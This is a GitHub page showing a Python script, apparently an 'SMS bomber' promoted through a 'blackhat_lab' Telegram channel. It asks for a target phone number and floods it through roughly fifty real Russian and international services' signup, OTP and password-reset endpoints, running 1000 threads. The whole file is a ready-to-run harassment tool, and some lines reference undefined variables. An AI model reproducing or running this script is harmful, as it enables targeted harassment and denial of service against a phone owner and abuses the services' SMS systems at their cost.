-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathsms_with_threading.py
362 lines (302 loc) · 12.4 KB
/
sms_with_threading.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
import requests, random, datetime, sys, time, argparse, os
import threading
banner = """
____________________________________________________
| |
| [--] Pleasy Subscribe to ~> t.me/blackhat_lab |
| |
| [--] Have Services: 51 |
| |
| [--] Created by: @in4osecurity |
| |
| [--] Version: 1.0.6 |
|____________________________________________________|
"""
try:
os.system("termux-open-url https://t.me/blackhat_lab")
except:
pass
print(banner)
_phone = input('Hello! Number for attack (79xxxxxxxxx)-->> ')
if _phone[0] == '+':
_phone = _phone[1:]
if _phone[0] == '8':
_phone = '7'+_phone[1:]
if _phone[0] == '9':
_phone = '7'+_phone
_name = ''
for x in range(12):
_name = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
password = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
username = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
_phone9 = _phone[1:]
_phoneAresBank = '+'+_phone[0]+'('+_phone[1:4]+')'+_phone[4:7]+'-'+_phone[7:9]+'-'+_phone[9:11]
_phone9dostavista = _phone9[:3]+'+'+_phone9[3:6]+'-'+_phone9[6:8]+'-'+_phone9[8:10]
_phoneOstin = '+'+_phone[0]+'+('+_phone[1:4]+')'+_phone[4:7]+'-'+_phone[7:9]+'-'+_phone[9:11]
_phonePizzahut = '+'+_phone[0]+' ('+_phone[1:4]+') '+_phone[4:7]+' '+_phone[7:9]+' '+_phone[9:11]
_phoneGorzdrav = _phone[1:4]+') '+_phone[4:7]+'-'+_phone[7:9]+'-'+_phone[9:11]
def sent():
try:
requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber': _phone,'countryCode': 'ID','name': 'test','email': '[email protected]','deviceToken': '*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'})
print('[+] Grab sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://moscow.rutaxi.ru/ajax_keycode.html', data={'l': _phone9}).json()["res"]
print('[+] RuTaxi sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://belkacar.ru/get-confirmation-code', data={'phone': _phone}, headers={})
print('[+] BelkaCar sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone}, headers={})
print('[+] Tinder sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': _phone}, headers={})
print('[+] Karusel sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://api.tinkoff.ru/v1/sign_up', data={'phone': '+'+_phone}, headers={})
print('[+] Tinkoff sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://api.mtstv.ru/v1/users', json={'msisdn': _phone}, headers={})
print('[+] MTS sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': _phone})
print('[+] Youla sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://pizzahut.ru/account/password-reset', data={'reset_by':'phone', 'action_id':'pass-recovery', 'phone': _phonePizzahut, '_token':'*'})
print('[+] PizzaHut sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://www.rabota.ru/remind', data={'credential': _phone})
print('[+] Rabota sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+'+_phone})
print('[+] Rutube sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://www.citilink.ru/registration/confirm/phone/+'+_phone+'/')
print('[+] Citilink sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name': _name,'phone': _phone, 'promo': 'yellowforma'})
print('[+] Smsint sent!')
except:
print('[-] Not sent!')
try:
requests.get('https://www.oyorooms.com/api/pwa/generateotp?phone='+_phone9+'&country_code=%2B7&nod=4&locale=en')
print('[+] oyorooms sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCodeForOtp', params={'pageName': 'loginByUserPhoneVerification', 'fromCheckout': 'false','fromRegisterPage': 'true','snLogin': '','bpg': '','snProviderId': ''}, data={'phone': _phone,'g-recaptcha-response': '','recaptcha': 'on'})
print('[+] MVideo sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://newnext.ru/graphql', json={'operationName': 'registration', 'variables': {'client': {'firstName': 'Иван', 'lastName': 'Иванов', 'phone': _phone,'typeKeys': ['Unemployed']}},'query': 'mutation registration($client: ClientInput!) {''\n registration(client: $client) {''\n token\n __typename\n }\n}\n'})
print('[+] newnext sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': _phone})
print('[+] Sunlight sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://alpari.com/api/ru/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/', json={'client_type': 'personal', 'email': _email, 'mobile_phone': _phone, 'deliveryOption': 'sms'})
print('[+] alpari sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://lk.invitro.ru/lk2/lka/patient/refreshCode', data={'phone': _phone})
print('[+] Invitro sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://online.sbis.ru/reg/service/', json={'jsonrpc':'2.0','protocol':'5','method':'Пользователь.ЗаявкаНаФизика','params':{'phone':_phone},'id':'1'})
print('[+] Sberbank sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://ib.psbank.ru/api/authentication/extendedClientAuthRequest', json={'firstName':'Иван','middleName':'Иванович','lastName':'Иванов','sex':'1','birthDate':'10.10.2000','mobilePhone': _phone9,'russianFederationResident':'true','isDSA':'false','personalDataProcessingAgreement':'true','bKIRequestAgreement':'null','promotionAgreement':'true'})
print('[+] Psbank sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': _phone})
print('[+] Beltelcom sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': _phone})
print('[+] Karusel sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms', json={'phone': '+' + _phone})
print('[+] KFC sent!')
except:
print('[-] Not sent!')
try:
requests.post("https://api.carsmile.com/",json={"operationName": "enterPhone", "variables": {"phone": _phone},"query": "mutation enterPhone($phone: String!) {\n enterPhone(phone: $phone)\n}\n"})
print('[+] carsmile sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://www.citilink.ru/registration/confirm/phone/+' + _phone + '/')
print('[+] Citilink sent!')
except:
print('[-] Not sent!')
try:
requests.post("https://api.delitime.ru/api/v2/signup",data={"SignupForm[username]": _phone, "SignupForm[device_type]": 3})
print('[+] Delitime sent!')
except:
print('[-] Not sent!')
try:
requests.get('https://findclone.ru/register', params={'phone': '+' + _phone})
print('[+] findclone call sent!')
except:
print('[-] Not sent!')
try:
requests.post("https://guru.taxi/api/v1/driver/session/verify",json={"phone": {"code": 1, "number": _phone}})
print('[+] Guru sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php',data={'msisdn': _phone, "locale": 'en', 'countryCode': 'ru','version': '1', "k": "ic1rtwz1s1Hj1O0r", "r": "46763"})
print('[+] ICQ sent!')
except:
print('[-] Not sent!')
try:
requests.post("https://terra-1.indriverapp.com/api/authorization?locale=ru",data={"mode": "request", "phone": "+" + _phone,"phone_permission": "unknown", "stream_id": 0, "v": 3, "appversion": "3.20.6","osversion": "unknown", "devicemodel": "unknown"})
print('[+] InDriver sent!')
except:
print('[-] Not sent!')
try:
requests.post("https://lk.invitro.ru/sp/mobileApi/createUserByPassword", data={"password": password, "application": "lkp", "login": "+" + _phone})
print('[+] Invitro sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://ube.pmsm.org.ru/esb/iqos-phone/validate',json={"phone": _phone})
print('[+] Pmsm sent!')
except:
print('[-] Not sent!')
try:
requests.post("https://api.ivi.ru/mobileapi/user/register/phone/v6",data={"phone": _phone})
print('[+] IVI sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://lenta.com/api/v1/authentication/requestValidationCode',json={'phone': '+' + self.formatted_phone})
print('[+] Lenta sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCode',params={"pageName": "registerPrivateUserPhoneVerificatio"},data={"phone": _phone, "recaptcha": 'off', "g-recaptcha-response": ""})
print('[+] MVideo sent!')
except:
print('[-] Not sent!')
try:
requests.post("https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone",data={"st.r.phone": "+" + _phone})
print('[+] OK sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://plink.tech/register/',json={"phone": _phone})
print('[+] Plink sent!')
except:
print('[-] Not sent!')
try:
requests.post("https://qlean.ru/clients-api/v2/sms_codes/auth/request_code",json={"phone": _phone})
print('[+] qlean sent!')
except:
print('[-] Not sent!')
try:
requests.post("http://smsgorod.ru/sendsms.php",data={"number": _phone})
print('[+] SMSgorod sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru',data={'phone_number': _phone})
print('[+] Tinder sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://passport.twitch.tv/register?trusted_request=true',json={"birthday": {"day": 11, "month": 11, "year": 1999},"client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp", "include_verification_code": True,"password": password, "phone_number": _phone,"username": username})
print('[+] Twitch sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://cabinet.wi-fi.ru/api/auth/by-sms', data={'msisdn': _phone},headers={'App-ID': 'cabinet'})
print('[+] CabWiFi sent!')
except:
print('[-] Not sent!')
try:
requests.post("https://api.wowworks.ru/v2/site/send-code",json={"phone": _phone, "type": 2})
print('[+] wowworks sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://eda.yandex/api/v1/user/request_authentication_code',json={"phone_number": "+" + _phone})
print('[+] Eda.Yandex sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': _phone})
print('[+] Youla sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://alpari.com/api/ru/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/',json={"client_type": "personal", "email": f"{email}@gmail.ru","mobile_phone": _phone, "deliveryOption": "sms"})
print('[+] Alpari sent!')
except:
print('[-] Not sent!')
try:
requests.post("https://api-prime.anytime.global/api/v2/auth/sendVerificationCode",data={"phone": _phone})
print('[+] SMS sent!')
except:
print('[-] Not sent!')
try:
requests.post('https://www.delivery-club.ru/ajax/user_otp', data={"phone": _phone})
print('[+] Delivery sent!')
except:
print('[-] Not sent!')
# Create a shared variable for thread counts
thread_num = 0
thread_num_mutex = threading.Lock()
num_requests = 1000
# Print thread status
def print_status():
global thread_num
thread_num_mutex.acquire(True)
thread_num += 1
print ("\n " + "[" + str(thread_num) + "] #-#-#-#-#-#")
thread_num_mutex.release()
# Spawn a thread per request
all_threads = []
for i in range(num_requests):
t1 = threading.Thread(target=sent)
t1.start()
all_threads.append(t1)
for current_thread in all_threads:
current_thread.join() # Make the main thread wait for the children threads